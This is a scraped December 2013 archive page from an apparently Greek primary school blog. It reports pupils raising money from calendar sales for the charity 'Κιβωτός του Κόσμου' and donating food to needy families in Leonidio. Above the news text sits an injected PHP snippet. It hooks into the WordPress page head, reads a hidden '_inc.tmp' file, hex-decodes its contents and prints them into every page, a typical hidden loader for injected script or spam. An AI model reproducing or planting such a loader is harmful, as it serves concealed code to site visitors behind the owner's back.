if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Δεκέμβριος, 2013 |

Monthly Archives: Δεκέμβριος 2013

ΟΙ ΜΑΘΗΤΕΣ ΤΟΥ ΔΗΜΟΤΙΚΟΥ ΣΧΟΛΕΙΟΥ ΚΟΝΤΑ ΣΤΑ ΠΑΙΔΙΑ ΤΗΣ “ΚΙΒΩΤΟΥ ΤΟΥ ΚΟΣΜΟΥ ”

Τα παιδιά της “Κιβωτού του Κόσμου” προέρχονται από πολύ φτωχές και δύσμοιρες οικογένειες . Ο μη κερδοσκοπικός Οργανισμός Ειδικής Μέριμνας και Προστασίας Μητέρας και Παιδιού “Κιβωτός του Κόσμου” φροντίζει να έχουν φαγητό, ενδύματα, υποδήματα, σχολικά εφόδια, γιατρούς και φάρμακα .

Για το λόγο αυτό οι μαθητές της Α΄, Β΄, Γ΄, Δ΄ και  ΣΤ΄ τάξης του Σχολείου μας, μέσα στο πνεύμα της γιορτής των Χριστουγέννων,  επέλεξαν φέτος να σταθούν πλάι τους.

Όσα χρήματα συγκέντρωσαν από την πώληση των ημερολογίων τους τα διέθεσαν ώστε να βάλουν ένα λιθαράκι στη βελτίωση των συνθηκών διαβίωσης αυτών των παιδιών.

Οι μαθητές της Ε΄ τάξης επέλεξαν να παραδώσουν είδη διατροφής για άπορες οικογένειες του Λεωνιδίου.